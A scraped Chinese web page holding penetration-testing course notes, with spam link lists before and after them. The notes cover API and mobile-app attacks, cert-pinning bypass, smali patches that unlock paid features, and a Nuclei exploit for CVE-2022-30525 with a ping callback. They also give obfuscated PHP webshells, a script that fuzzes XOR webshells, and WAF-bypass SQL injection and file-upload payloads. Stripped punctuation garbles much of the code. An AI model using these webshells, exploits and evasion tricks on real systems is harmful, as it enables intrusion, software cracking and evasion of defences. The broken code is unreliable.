当前位置: 首页 > news >正文

微网站下载资料怎么做做同款的网站

微网站下载资料怎么做,做同款的网站,北京网页设计公司兴田德润可信赖,矿泉水软文广告500字API攻防 知识点#xff1a; 1、HTTP接口类-测评 2、RPC类接口-测评 3、Web Service类-测评 内容点#xff1a; SOAP#xff08;Simple Object Access Protocol#xff09;简单对象访问协议是交换数据的一种协议规范#xff0c;是一种轻量级的、简单的、基于XML#…API攻防 知识点 1、HTTP接口类-测评 2、RPC类接口-测评 3、Web Service类-测评 内容点 SOAPSimple Object Access Protocol简单对象访问协议是交换数据的一种协议规范是一种轻量级的、简单的、基于XML标准通用标记语言下的一个子集的协议它被设计成在WEB上交换结构化的和固化的信息。SOAP部署Web Service的专有协议。SOAP使用HTTP来发送XML格式的数据可以简单理解为SOAPHTTPXML RESTRepresentation State Teansfer即表述性状态传递在三种主流的Web服务实现方案中因为REST模式的Web服务与复杂的SOAP和XML-RPC对比来讲明显的更加简洁越来越多的web服务开始采用REST风格设计和实现。例如Amazon.com提供接近REST风格的Web服务进行图书查找雅虎提供的Web服务也是REST风格的。 WSDLWeb Services Description Language即网络服务描述语言用于描述Web服务的公共接口。这是一个基于XML的关于如何与Web服务通讯和使用的服务描述也就是描述与目录中列出的Web服务进行交互时需要绑定的协议和信息格式。通常采用抽象语言描述该服务支持的查找和信息使用的时候再将实际的网络协议和信息格式绑定给该服务。 接口数据包 Method:请求方法 攻击方式OPTIONS,PUT,MOVE,DELETE 效果上传恶意文件修改页面等 URL位移资源定位符 攻击方式猜测遍历跳转 效果未授权访问等 Params请求参数 攻击方式构造参数修改参数遍历重发 效果爆破越权未授权访问突破业务逻辑等 Authorization认证方式 攻击方式身份伪造身份篡改 效果越权未授权访问等 Headers请求消息头 攻击方式拦截数据包改Hosts改Referer改Content-Type等 效果绕过身份认证绕过Referer验证绕过类型验证DDOS等 Body消息体 攻击方式SQL注入XML注入反序列化等 效果提权突破业务逻辑未授权访问等 安全问题 XSS跨站信息泄露暴力破解文件上传未授权访问JWT授权认证接口滥用等 WebService类-WsdlSoapUI 探针?wsdl 利用SoapUIReadyAPI SOAP类-SwaggerSoapUIEXP 探针目录JS资源 利用SoapUIEXP https://github.com/lijiejie/swagger-exp https://github.com/jayus0821/swagger-hack 目录 /swagger /api/swagger /swagger/ui /api/swagger/ui /swagger-ui.html /api/swagger-ui.html /user/swagger-ui.html /libs/swaggerui /api/swaggerui /swagger-resources/configuration/ui /swagger-resources/configuration/security HTTP类-WebpackPackerFuzzer 探针插件JS资源 利用PackerFuzzer https://github.com/rtcatc/Packer-Fuzzer Postman自动化测试 https://www.postman.com/downloads/ Dvws泄露鉴权XXE https://github.com/snoopysecurity/dvws-node Aliyun-accesskey-tools-main APP攻防 知识点 a:资产提权-AppinfoScanner b:评估框架-MobSFmobexler c:抓包利器-Fridar0caprure 章节点 1、信息搜集-应用资产提取权限等 2、漏洞发现-反编译脱壳代码审计 3、安全评估-组件敏感密匙恶意分析 核心点 A:内在点-资产提取版本信息等 B:抓包点-反代理反证书协议等 C:逆向点-反编译脱壳重打包等 D:安全点-资产接口漏洞审计等 内在-资产提取-AppinfoScanner AppinfoScanner一款适用于以HW行动/红队/渗透测试团队为场景的移动端Android、iOS、WEB、H5、静态网站信息搜集扫描工具可以帮助渗透测试工程师、攻击队成员、红队成员快速搜集到移动端或者静态WEB站点中关键的资产信息并提供基本的信息输出。如Titile、Domain、CDN、指纹信息、状态信息等。 https://github.com/kelvinBen/AppInfoScanner 内在-安全评估-MobSFmobexler 移动安全框架MobSF是一种自动化的一体化移动应用程序Android/iOS/Windows渗透测试、恶意软件分析和安全评估框架能够执行静态和动态分析。MobSF支持移动应用程序二进制文件APK、XAPK、IPA和APPX以及压缩源代码并提供REST API以与您的CI/CD或DevSecOps管道无缝集成动态分析器可帮助您执行运行时安全评估和交互式仪器测试。 Mobexler是基于Elementary OS的定制虚拟机旨在帮助进行Android和iOS应用程序的渗透测试。Mobexler预装了各种开宇工具脚本黑客必备软件等这些都是安全测试Android和iOS应用程序所必须的。 https://mobexler.com/ https://github.com/MobSF/Mobile-Security-Framework-MobSF docker pull opensecurity/mobile-security-framework-mobsf docker run -it -p 8008:8000 opensecurity/mobile-security-framework-mobsf:latest 外在-证书抓包- frida-serverr0capture r0capture仅限安卓平台测试安卓7、8、9、10、11可用 无视所有证书校验或绑定不用考虑任何证书的事情 通杀TCP/IP四层模型中的应用层中的全部协议 同时协议包括HttpWebSocketFtpXmpplmapSmtpProtobuf等、及他们的SSL版本 通杀所有应用层框架包括HttpUrlConnection、Okhttp1/3/4、Retrofit/Volley等等 无视加固不管是整体壳还是二代壳或VMP不用考虑加固的事情 Firda是一款易用的跨平Hook工具Java层到Native层的Hook无所不能是一种动态的插桩工具可以插入代码到原生App的内存空间中动态的去监视和修改行为原生平台包括WinMacLinux、Android、iOS全平台 测试环境 Windows10 Python3.7 夜神模拟器 r0capture frida-server wireshark https://github.com/r0ysue/r0capture https://github.com/frida/frida/releases 1、本地安装Frida pip install frida pip install frida-tools 2、模拟器安装Frida 注意版本要和本地Frida一致 下载https://github.com/frida/frida/releases 真机ARM版本及位数 模拟器无ARM的位数 getprop ro.product.cpu.abi adb push frida-server /data/local cd /data/local/tmp/ chmod 777 frida-server ./frida-server ps | grep frida 3、转发并启动Frida adb forward tcp:xxxx tcp:xxxx 连接判断frida-ps -U frida-ps -R 4、获取包名并运行抓包 获取包名ls /data/data 或Apk Messager python r0capture.py -U -f 包名 -p xxxx.pacp 知识点 1APP防代理绕过-应用转发 2APP证书校验类型-单项双向 3APP证书校验绕过-FridaXP框架等 章节点 1】信息收集-应用资产提取权限等 2】漏洞发现-反编译脱壳代码审计 3】安全评估-组件敏感密匙恶意分析 核心点 0、内在点-资产提取版本信息等 1、抓包点-反代理反证书协议等 2、逆向点-反编译脱壳重打包等 3、安全点-资产接口漏洞审计等 反代理绕过 https://zone.huoxian.cn/d/440-app 1.自身的抓包应用 2.Proxifier转发使用 证书校验绕过 情况一客户端不存在证书校验服务器也不存在证书校验 情况二客户端存在校验服务端证书服务器不存在证书校验单项校验 情况三客户端存在证书校验服务器也存在证书校验双向校验。 1、fridar0capture底层        可绕过双向 2、XposedJustTrustHOOK        只能绕过单向 3、反编译逆向提取证书重编打包 A:单纯开上模拟器的代理后打不开没有出现数据包的情况        反代理 B:用到proxifier转发后也打不开带上出现了数据包的情况        反证书 反编译打包 反编译加固-自动查壳脱壳 https://github.com/CodingGay/BlackDex 查壳ApkScan-PKID 脱壳BlackDex 功能修改-反编译次数会员 次数 逻辑修改手机型号 .method public getRe_today_view_times()Ljava/lang/String; .locals 1 .line 307 iget-object v0,p0,Lcom/ufozfnxzqm/dvbphwfo/entity/UserInfo;-re_today_view_times:Ljava/lang/String;I const-string v0,999999 return-object v0 .end method 会员 .method public getIs_vip() .locals 1 .line 347 iget v0,p0,Lcom/ufozfnxzqm/dvbphwfo/entity/UserInfo;-is_vip;l const/4 v0,0x1 return v0 .end method 功能修改-反编译图标信息 打包编译-证书签名修改信息 安卓修改大师-替换图标修改信息 安卓修改大师-证书自带重打包选择 微信小程序 0、apk信息资源提取 1、微信小程序-数据抓包 2、微信小程序-解包反编译 appapk-信息资源文件提取 APK Messenger-基本信息资源文件开启权限等 微信小程序-真机模拟器数据抓包 安卓系统抓包微信小程序 1、安卓系统7.0以下版本不管微信任意版本都会信任系统提供的证书 2、安卓系统7.0以上版本微信7.0以下版本微信会信任系统提供的证书 3、安卓系统7.0以上版本微信7.0以上版本微信只信任他自己配置的证书列表 基于上述我们解决的方式如下 1、将证书安装到系统证书中需要root 2、苹果手机苹果手机不受此影响 3、采用安卓系统低于7.0的模拟器 4、使用低版本电脑版微信抓包 演示逍遥模拟器5.1安卓系统微信小程序抓包 演示夜神模拟器多开5安卓系统微信小程序抓包 演示真机IPhone-IOS系统微信小程序抓包 条件抓包本机需要和IPhone手机处于同一WIFI下 iphone配置wifi的代理代理设置地址写本地抓包工具地址和端口 微信小程序-PC模拟器分包反编译 1、富哥 欢迎使用多功能小程序助手工具点击确定开始使用 免责声明不得将小程序反编译源码程序和反编译图片素材挪用商业或盈利使用 使用教程地https://www.kancloud.cn/ludeqi/xcxzs/2607637 新版下载地址https://xcx.siqingw.top/xcx.zip 2、穷哥们 https://github.com/sanriqing/WxAppUnpacker 安装node.js https://nodejs.cn/download/ 安装依赖 npm install 模拟器取出wxapkg文件 /data/data/com.tencent.mm/MicroMsg/xxxxxx/appbrand/pkg 反编译解包 node wuWxapkg.js -s../xxx.wxapkg 安全点 1、渗透角度测试的app提供服务的服务器网站接口等一旦这个有安全问题被不法分子利用相当于App正常服务就会收到直接影响 APK-白盒-Java代码审计 APK-黑盒-资产WebIP接口等 小程序-白盒-Node.js代码审计 小程序-黑盒-资产WebIP接口等 2、开发角度测试的app里代码的设计安全采用没加密的发送数据采用权限过高的设置导致攻击者利用app获取到手机的敏感信息等 弱加密逻辑安全授权中间人等      流程 A:信息收集 抓包-APP里面涉及的资产 反编译提取-APP里面涉及的资产 B:资产-信息收集 web应用 cms 中间件 框架 服务器IP 端口等 webpack         webpackfuzz打包分析 web漏洞扫描        awvs进行简单探针 安全测试报告 1、Spring Boot Actuator v2未授权访问 2、Spring Boot RCE 3、HeapDump-信息泄露-账号密码等 select s from  java.lang.String s where /pass/.test(s.value.toString()) HeapDump分析 JVisualVM MAT heapdump_tool等 JVisualVMjdk自带 MAThttps://www.eclipse.org/mat/downloads.php heapdump_tool:https://github.com/wyzxxz/heapdump_tool Actuator未授权检测 https://github.com/rabbitmask/SB-Actuator Springboot漏洞检测 https://github.com/LandGrey/SpringBootVulExploit OSS_AccessKey利用 https://github.com/mrknow001/aliyun-accesskey-Tools    漏洞发现                          Web框架中间件 1、Burp 简单介绍使用说明 2、Xray 简单介绍使用说明 3、Awvs 简单介绍使用说明 4、Goby  简单介绍使用说明 5、Afrog  简单介绍使用说明 6、Vulmap  简单介绍使用说明 7、Pocassist  简单介绍使用说明 8、掌握工具安装使用原理联动适用 市面上有很多漏扫系统工具脚本课程讲到的基本都是目前主流推荐的优秀项目 具体项目BurpsuiteAwvsXrayGobyAfrogVulmapPocassistNessusNucleiPentestkitKunyuBP插件HaEShiroScanFastJsonScanLog4j2Scan等等。 章节点 1、漏洞发现-web框架层面 2、漏洞发现-服务中间件层面 3、漏洞发现-APP小程序层面 4、漏洞发现-PC操作系统层面 Acunetix一款商业的Web漏洞扫描程序它可以检查Web应用程序中的漏洞如SQL注入、跨站脚本攻击、身份验证页上的弱口令长度等。它拥有一个操作方便的图形用户界面而且能够创建专业级的Web站点安全审核报告。新版本集成了漏洞管理功能来扩展企业全面管理、优先级和控制漏洞威胁的能力 。。。 https://www.ddosi.org/awvs14-6-log4j-rce/ https://github.com/chatin/xray/releases https://github.com/zan8in/afrog/releases https://github.com/zhzyker/vulmap/releases https://github.com/jweny/pocassist/releases https://github.com/gobysec/Goby/releases 其他特扫 1、GUI_TOOLS_v6.1_by安全圈小王子-bugfixed 2、CMS漏洞扫描器名称 支持的CMS平台 Droopescan WordPressJoomlaDrupalMoodleSilverStripeCMSmap WordPressCMSeek WordPressWPXF wordpressWPScan WordPressWPSeku WordPressWPForce WordPressJoomlaVSJoomlaJScanner JoomlaDrupwn DrupalTypo3Scan Typo3 致远OA综合利用工具        https://github.com/Summer177/seeyon_exp seeyon_exp 通达OA综合利用工具        https://github.com/xinyu2428/TDOA_RCE TDOA_RCE 蓝凌OA漏洞利用工具/前台无条件RCE/文件写入 https://github.com/yuanhaiGreg/LandrayExploit LandrayExploit 泛微OA漏洞综合利用脚本 https://github.com/z1un/weaver_exp weaver_exp 锐捷网络EG网关RCE批量安全检测      https://github.com/Ras9er/EgGateWayGetShellEgGateWayGetshell CMSmap针对流行CMS进行安全扫描的工具 https://github.com/Dionach/CMSmap 使用Go开发的WordPress扫洞工具 https://github.com/blackbinn/wprecon 一个Ruby框架旨在帮助对wordpress系统进行渗透测试 https://github.com/rastating/wordpress-exploit-framework WPScan WordPress安全扫描器        https://github.com/wpscantea,/wpscan WPForce WordPress攻击套件        https://github.com/n00py/WPForce 某APP-web扫描-常规联动-BurpAwvsXray 对比工具优缺点 对比工具使用方法 Awvs 任务添加数据头代理模式扫描模式等 examplehttp://demo.aisec.cn/ Xray: 主动扫描被动扫描POC资源等 .\xray_windows_amd64.exe webscan --basic-crawler http://xx/ --html-output tomcat.html .\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output app.html URL单点扫描数据包扫描 1、相互联动性解决漏扫 2、相互联动性解决URL未探针 手工触发URL数据包扫描器爬虫规则探针 BurpXray联动 1、Burp设置代理转发 2、Xray设置被动扫描 AwvsXray联动 1、Awvs设置代理扫描 2、Xray设置被动扫描 AwvsBurpXray联动 1、Awvs设置代理扫描 2、Burp设置转发代理 3、Xray设置被动扫描 Vulfocus-框架扫描-特定核心-GobyvulmapAfrogPocassist 案例配合vulfocus进行某服务或中间件的安全检查评估 某资产特征-联动扫描-综合调用-GobyAwvsXrayVulmap 案例配合GobyFofa插件进行某中间件的安全检查评估 1、下载拓展插件 2、设置配置插件 3、扫描调用插件 操作系统漏洞扫描 案例1-NessusNexpose漏扫操作系统漏洞 案例2-GobyNuclei漏扫系统服务中间件漏洞 Nuclei -u http://xxx 案例3-Nuclei漏扫特定资产模板导入最新漏洞 例子CVE-2022-30525Zyxel防火墙远程命令注入漏洞 FofaViewertitleUSG FlEX 50 (USG20-VPN) nuclei exe -t Zyxel.yaml -l z.txt Zyxel.yaml; id:CVE-2022-30525 info: name:cx author:remote severity:high tags:CVE-2022-30525 reference:CVE-2022-30525 requests -raw -I POST /zip/cgi-bin/handler HTTP/1 1 Host {{Hostname}} Content-Type:application/json;charsetutf-8 {command:setWanPortSt,proto:dhcp,port:1270,vlan_tagged:1270,vlanid:1270,mtu:{{exploit}},data:} payloads: exploit: -,ping -c 3 {{interactsh-url}}; attack:pitchfork matchers: -type:word part:interactsh_protocol name:dns words: -dns 案例4-FofaMapNuclei漏扫自动化特定资产漏洞 Burp插件以及其他工具 漏洞利用 知识点 1、MSF-漏洞利用框架使用 2、库查找-CVECNVD关键字 3、库整理-CVECNVD漏洞详情 4、新漏洞-框架或其他未集成利用 集成和未集成漏洞的利用思路漏洞利用条件等 漏洞资源 today-cve https://cassandra.cerias.purdue.edu/CVE_changes/today.html cve官网 https://cve.mitre.org/ 国家信息安全漏洞共享平台 https://www.cnvd.org.cn/ 国家信息安全漏洞库 http://www.cnnvd.org.cn/        漏洞利用-整理库-PocOrExpCVE-CNVD https://github.com/ttonys/Scrapy-CVE-CNVD https://github.com/ycdxsb/PocOrExp_in_Github 漏洞利用-查找库-SearchSploitPoC-in-GitHub https://github.com/nomi-sec/PoC-in-GitHub https://github.com/offensive-security/exploitdb 漏洞利用-模块框架-MetaSploit-FrameworkMSF https://www.metasploit.com/ 安装下载https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html 简单使用 https://blog.csdn.net/weixin_42380348/article/details/123549631 漏洞利用-杂乱工具-特定图像化渗透武器库v6.1 Waf攻防 知识点 1、WAF介绍模式识别防护等 2、信息收集-被动扫描第三方接口 3、信息收集-基于爬虫文件目录探针 4、信息收集-基于用户代理池白名单 章节点 WAF绕过主要集中在信息收集漏洞发现漏洞利用权限控制四个阶段。 补充点 1、什么是WAF Web Application Firewallweb应用防火墙一种公认的说法是“web应用防火墙通过执行一系列针对HTTP/HTTPS的安全策略来专门为web应用提供保护的一款产品。” 基本可以分为以下四种 软件型WAF 以软件的形式安装在服务器上面可以接触到服务器上的文件因此就可以检测服务器上是否有webshell是否有文件被创建等。 硬件型WAF 以硬件形式部署在链路中支持多种部署方式。当串联到链路上时可以拦截恶意流量在旁路监听模式时只记录攻击但是不进行拦截 云WAF 一般以反向代理的形式工作通过配置后使对网站的请求数据优先经过WAF主机在WAF主机对数据进行过滤后再传给服务器 网站内置的WAF 就是来自网站内部的过滤直接出现在网站代码中比如说对输入的参数强制类型转换对输入的参数进行敏感词检测 2、如何判断WAF Wafw00f看图识别其他项目脚本平台 https://mp.weixin.qq.com/s/3uUZKryCufQ_HcuMc8ZgQQ 3、常见WAF拓扑防护 流量走向常见漏洞 4、目前有哪些常见WAF产品 参考https://blog.csdn.net/w2sft/article/details/104533082/ 1硬件型 硬件型WAF以一个独立的硬件设备的形态存在支持多种方式如透明桥接模式、旁路模式、反向代理等部署到网络中为后端的Web应用提供安全防护是最为传统的WAF形态在受访企业中部署占比为35.2%。相比于软件产品类的WAF这类产品的优点是性能好、功能全面、支持多种模式部署等但它的价格通常比较贵。国内的绿盟安恒启明星辰等老牌厂商旗下的WAF都属于此类。 2软件型 这种类型的WAF采用纯软件的方式实现特点是安装简单容易使用成本低。但它的确定也是显而易见的除了性能收到限制外还可能会存在兼容性安全等问题。这类WAF的代表有ModSecurity、Naxsi、ShareWAF、安全狗等。 3云WAF 随着云计算技术的快速发展使得基于云的WAF实现成为可能在本次调查中占比甚至超过了传统的硬件WAF跃升为第一位达到39.4%。阿里云、腾讯云、深信服云WAF、Imperva WAF这类WAF的典型代表 信息收集常见检测 1、脚本或工具速度流量快 2、脚本或工具的指纹被识别 3、脚本或工具的检测Payload 信息搜集常见方法 1、延迟解决请求过快封IP情况 2、代理池在确保速度的情况下解决请求过快封IP的拦截 3、白名单模拟白名单模拟WAF授权测试解决速度及测试拦截 4、模拟用户模拟真实用户数据包请求探针解决WAF指纹识别 信息搜集-被动扫描-黑暗引擎第三方接口 黑暗引擎Fofa Quake Shodan Zoomeye 0.zone等 其他接口https://forum.ywhack.com/bountytips.php?getinfo 信息收集-目录扫描-Python代理加载脚本 import requests import time headers{ Connection:keep-alive, Cache-Control:max-age0, Upgrade-Insecure-Requests:1, User-Agent:Mozilla/5.0(Windows NT 10.0;Win64;x64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/89.0.4389.114 Safari/537.36, Sec-Fetch-Dest:document, Accept:text/html,application/xhtmlxml,application/xml;q0.9,image/webp,image/apng,*/*,q0.8,application/signed-exchange;vb3;q0.9, Sec-Fetch-Site:none, Sec-Fetch-Node:navigete, Sec-Fetch-User:?1, Accept-Language:zh-CN,zh;q0.9,en-US;q0.8,en;q0.7, Cookie:bdshare firstime1581597934650;PHPSESSIONncsajdvh39g } for paths in open(php_b.txt,encodingutf-8):        #字典位置 urlhttp://www.xx.com/ pathspaths.replace(\n,) urlsurlpaths proxy{ http:xxx.xxx.com:xxxx,#代理服务器 } try: coderequests.get(urls,headersheaders,proxiesproxy).status_code #reqrequests.get(urls,headersheaders,proxiesproxy) #print(urls) #print(req.text) #time.sleep() print(urls|str(code)) if code200 or code403: print(urls|str(code)) except Exception as err: print(connectiong error) time.sleep(3) 知识点 1、脚本后门基础原理 2、脚本后门查杀绕过机制 3、权限维持-覆盖传参加密异或等 代码块传参数据工具指纹等表面行为 1、代码表面层免杀-ASPPHPJSPASPX等 2、工具行为层免杀-菜刀蚂剑冰蝎哥斯拉等 基础-脚本后门控制原理-代码解释 对比工具代码-菜刀蚁剑冰蝎哥斯拉等 原理-脚本后门查杀机制-函数行为 对比WAF规则-函数匹配工具指纹等 代码-脚本后门免杀变异-覆盖传参 1、php传参带入 ?php $a$_GET[a]; $aa$a.ert; $aa(base64_decode($_POST[x])); ? ?aass xcGhwaW5mbygpOw 2、php 变量覆盖 ?php $ab; $bassert; $$a(base64_decode($_POST[x])); ? 3、php 加密变异 http://www.phpjm.net/ https://www.phpjms.com/ http://1.15.155.76:1234/ 4、php异或运算 import requests import time import threading.queue def string(): while not q.empty(): filenameq.get() urlhttp://127.0.0.1:8081/x/filename datas{ x:phpinfo(); } resultrequests.post(url,datadatas).content.decode(utf-8) if XIAODI-PC in result: print(check-filename-ok) else print(check-filename-no) time.sleep(1) def shell_test_check() urlhttp://127.0.0.1:8081/x/33xd64.php datas{ x:phpinfo(); } resultrequests.post(url,datadatas)content.decode(utf-8) print(result) if XIAODI-PC in result print(ok) if __name____main__ qqueue.Queue() for i in range(1,127): for ii in range(1,127): payloadchr(i)chr(ii) code?php $a(payload).ssert;$a($_POST[x]);? filename str(i)xdstr(ii).php q.put(filename) with open(D:/phpstudy/PHPTutorial/WWW/x/filename.a) as f: f.write(code) f.close()  print(Fuzz文件生成成功) for x in range(20): tthreading Thread(targetstring) t.start() php混淆加密 blog.csdn.net/qq_41617034/article/details/104441032 ?php $fuhao!#$%^*()_?:,.{}[]\|/; $zimuQWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm; $strlen_fuhaostrlen($fuhao); $strlen_zimustrlen($zimu); for($i0;$i$strlen_fuhao;$i){ for($j0;$j$strlen_zimu;$j){ echo $fuhao[$i].^.$zimu[$j].--.($fuhao[$i]^$zimu[$j]); echo br; } } ? 拓展-脚本后门脚本类型-JSPASPX 5、php脚本生成器 Webshell-venom ASP PHP JSP ASPX 菜刀-流量绕过检测 1、版本 2014 $_POST$_REQUEST 2016可以 2、特征 数据包流量特征 1、请求包中ua头为百度爬虫 2、请求体中存在evalbase64等特征字符 3、请求体中传递的payload为base64编码并且存在固定的语句 冰蝎-流量绕过特征检测 1、介绍 冰蝎利用了服务器端的脚本语言加密功能通讯的过程中 消息体内采用AES加密基于特征值检测的安全产品无法查出 2、通讯 以代码Key为密钥的AES加密解密功能 3、特征 1User-agent:代码中定义 2Pragma:no-cache 3Content-Type:application/x-www-form-urlencoded 4Accept:text/html,application/xhtmlxml,application/xml;q0.9,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.9 5Accept-Encoding:gzip,deflate,br 6Accept-Language:zh-CN,zh;q0.9,en-US;q0.8,en;q0.7 哥斯拉-流量绕过特征检测 1、通讯加密 2、特征 1User-Agent:mozilla/5.0(Windows NT 10.0;Win64;x64;rv:84.0)Gecko/20100101 Firefox/84.0 2Accept:text/html,application/xhtmlxml,application/xml;q0.9,image/webp,*/*;q0.8 3Accept-Language:zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 4Cookie:PHPSESSIONrut2a51prso470jvfe2q502o44; cookie最后面存在一个; 知识点 1、Http/sSock5协议 2、AwvsXrayGoby代理 3、Proxifier进程代理利用 4、SafedogBTAliyun防护 在漏洞发现中WAF会对三个方向进行过滤拦截 1、流量速度问题 2、工具的指纹被扫描 3、工具的检测POC或Payload Awvs漏扫-safedog-白名单-内置 加入白名单扫描防safedog拉黑ip awvs漏扫-BTAliyun-代理池-内置 加入代理池扫描。防BT或Aliyun拉黑IP Xray漏扫-BTAliyun-Proxifier-进程 加入代理吃扫描防BT或Aliyun拉黑IP 知识点 1、SQL注入文件上传绕过 2、XSS跨站其他漏洞绕过 3、HPP污染垃圾数据分块等 参考点 将MySQL注入函数分为几类 拆分字符串函数midleftlpad等 编码函数ord、hex、ascii等 运算函数 - * / ^ ! like rlike reg 等 空格替换部分09、0a、0b、0c、0d等 关键数据函数user()、version()、database()等 然后将这些不同类型的函数组合拼接在一起 上传参数名解析明确哪些东西能修改 Content-Disposition:一般可以修改 name:表单参数值不能修改 filename:文件名可以修改 Content-Type:文件MIME视情况更改 XSS跨站 利用XSStrike绕过 加上--timeout或--proxy配合代理池绕过ccFuzz 其他集合 RCE 加密加码绕过算法可逆关键字绕过提交方法各种测试 txt$ystr_replace(x,,pxhpxinxfo());assert($y);submit%E6%8F%90%E4%BA%A4 文件包含 ..\        ..../        ..\.\等 安全狗-SQL注入文件上传 SQL注入 https://www.cnblogs.com/cute-puli/p/11146625.html 关键字替换 http://192.168.0.100:8081/sqlilabs/Less-2/?id1 like 1 http://192.168.0.100:8081/sqlilabs/Less-2/?id1 like 12 更换提交方式 POST id -1 union select 1,2,3-- 模拟文件上传 传递数据 分块传输更改数据请求格式 https://github.com/c0ny1/chunked-coding-converter HPP参数污染id1/**id-1%20union%20select%201,2,3%23*/ 文件上传换行解析垃圾溢出%00干扰符号干扰参数模拟 filenamea.php filenamea.php filenamea.php%00 垃圾数据;filenamea.php 无限filename;filenamea.php filenamea.php filenamenameuploadfile.php filenameContent-Disposition:form-data.php filenamea.ph p 安全狗-文件包含代码执行-知识点 BTAliyun-SQL注入文件上传 python sqlmap.py -u http://xxx?name*submit%E6%9F%A5%E8%AF%A2 --random-agent --tamperrdog.py --proxyhttp://xxx代理服务器 格式替换 BTAliyun-文件包含代码执行 https://github.com/s0md3v/XSStrike python xsstrike.py -u http://xx?mesage1submitsubmit --proxy
http://www.hkea.cn/news/14450810/

相关文章:

  • 设计的好网站一个ip可以建设多少个网站
  • 制作网站多少钱网站建设怎么开发客户
  • 上海买二手房做哪个网站好新闻发布系统
  • 做搜狗pc网站优化点下载wordpress低版本
  • 网站内链怎么删除菏泽网站建设费用
  • 做免费导航网站学编程的软件有哪些
  • 石景山网站建设服务万能网站网址下载
  • 怎么做网站注册名密码天津广告设计公司
  • 湛江企业建站程序运城注册公司
  • 自己的电脑做网站可以吗通过数字化营销搭建网络建设
  • wordpress建站软件做软件的软件
  • 做网站UI工具哪里有免费的h5模板
  • 怎样建设网站最好什么是电商
  • 网站推广有哪些手段建大型网站需要多少钱
  • 食品网站设计方案周宁县建设局网站
  • 太原高端网站建设工服专业制作
  • 旅游营销型网站建设苏州网站开发公司兴田德润在哪儿
  • 外贸建站 wordpress设计建设网站公司网站
  • WordPress添加下一篇最适合seo的wordpress主题
  • 网站建设对企业的作用简易html个人介绍网页
  • 网站建设的研究背景wordpress 3.9.1下载
  • 多语言网站制作工商企业网
  • 网站图片怎么做超链接做商城网站要哪些流程图
  • 杭州门户网站建设北海做网站的网络公司
  • 网站突然找不到了 然后降权重 排名不变一个电商网站开发要多久
  • 常州 网站建设色一把看片网 做最好的在线看片网站
  • 上海工程建设招投标网站知名企业官网
  • 织梦网站会员中心模板网站开发培训怎么样
  • 网站404页面优化建设局网站建设方案书
  • 网站分级怎么做安徽网站优化好不好